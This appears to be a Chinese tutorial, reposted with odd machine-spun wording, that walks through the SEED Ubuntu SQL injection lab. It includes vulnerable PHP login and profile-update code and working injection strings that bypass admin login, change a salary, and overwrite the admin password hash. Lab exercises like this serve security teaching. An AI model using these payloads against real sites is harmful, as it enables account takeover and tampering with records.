select 列名 from 表名

update语句用于修正表中的数据

update 表名 set 列名 2= 值2 where 列名1 = 值1

php注入攻击什么是SQL注入进击 Java

普通的说 什么是SQL注入呢?

ailx10

网络安全精良回答者

网络安全硕士

便是用户输入的时候 输入SQL语句 变动后台SQL语句的预定的实行命令

SQL 教程www.w3school.com.cn/sql/

实验环境准备

在SEED Ubuntu12虚拟机中安装SQL注入实验网站

$ tar -zxvf ./patch.tar.gz$ cd patch$ chmod a+x bootstrap.sh$ ./bootstrap.sh

关闭PHP SQL注入攻击保护机制

在/etc/php5/apache2/php.ini文件中

修正magic quotes gpc = On为Off

启动Apache做事(sudo service apache2 start)

在另一台Linux主机上配置DNS(在/etc/hosts文件添加)

192.168.59.156 www.seedlabsqlinjection.com

ok!现在你可以成功访问了 通过命令行登录并查看数据库信息如下

$ mysql -u root -pseedubuntumysql> use Users;mysql> show tables;+-----------------+| Tables_in_Users |+-----------------+| credential |+-----------------+mysql> select from credential;+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+| ID | Name | EID | Salary | birth | SSN | PhoneNumber | Address | Email | NickName | Password |+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+| 1 | Alice | 10000 | 20000 | 9/20 | 10211002 | | | | | fdbe918bdae83000aa54747fc95fe0470fff4976 || 2 | Boby | 20000 | 30000 | 4/20 | 10213352 | | | | | b78ed97677c161c1c82c142906674ad15242b2d4 || 3 | Ryan | 30000 | 50000 | 4/10 | 98993524 | | | | | a3c50276cb120637cca669eb38fb9928b017e9ef || 4 | Samy | 40000 | 90000 | 1/11 | 32193525 | | | | | 995b8b8c183f349b3cab0ae7fccd39133508d2af || 5 | Ted | 50000 | 110000 | 11/3 | 32111111 | | | | | 99343bff28a7bb51cb6f22cb20a618701a2c2f58 || 6 | Admin | 99999 | 400000 | 3/5 | 43254314 | | | | | a5bdf35a1df4ea895905f6f6618e83951a6effc0 |+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+

网站原始基本信息如下:

User Employee ID Password Salary Birthday SSN Nickname Email Address Phone#Admin 99999 seedadmin 400000 3/5 43254314Alice 10000 seedalice 20000 9/20 10211002Boby 20000 seedboby 50000 4/20 10213352Ryan 30000 seedryan 90000 4/10 32193525Samy 40000 seedsamy 40000 1/11 32111111Ted 50000 seedted 110000 11/3 243432441.SQL注入:如何越权直接变身成admin?

下面是网站登录模块的代码 找找漏洞?

$conn = getDB();$sql = "SELECT id, name, eid, salary, birth, ssn,phonenumber, address, email, nickname, PasswordFROM credentialWHERE eid= '$input_eid' and password='$input_pwd'";$result = $conn->query($sql))// The following is psuedo codeif(name=='admin'){return All employees information.} else if(name!=NULL){return employee information.} else {authentication fails.}

漏洞:"WHERE eid= '$input_eid' and password='$input_pwd'"

攻击串:' or Name='admin';#

成功登录如下

2.SQL注入:如何修正salary摇身一变变大款 ?

网站供应了一个页面 让用户修正自己的昵称 邮件 地址 电话 密码

更新个人信息的代码是这样写的 如何才能修正自己的salary金钱呢?

$conn = getDB();$sql = "UPDATE credential SET nickname='$nickname',email='$email',address='$address',phonenumber='$phonenumber',Password='$pwd'WHERE id= '$input_id' ";$conn->query($sql))

咱们在命令行查看数据库的时候 是不是看到了Salary信息

漏洞:$sql = "UPDATE credential SET nickname='$nickname',...

攻击串:',salary='9999999' where Name='Alice'#

瞬间让Alice同学成为最富有的人

3.SQL注入:如何修正password让admin无路可走 ?

root@gt:/home# echo -n "seedadmin" | openssl sha1(stdin)= a5bdf35a1df4ea895905f6f6618e83951a6effc0root@gt:/home# echo -n "hackbiji.top" | openssl sha1(stdin)= a504e9efce2d451b08c285b2dfd2e7f8b241ba03root@gt:/home#

攻击串:',Password='a504e9efce2d451b08c285b2dfd2e7f8b241ba03' where Name='Admin'#

现在Admin登录不上自己的帐号了 可怜的站长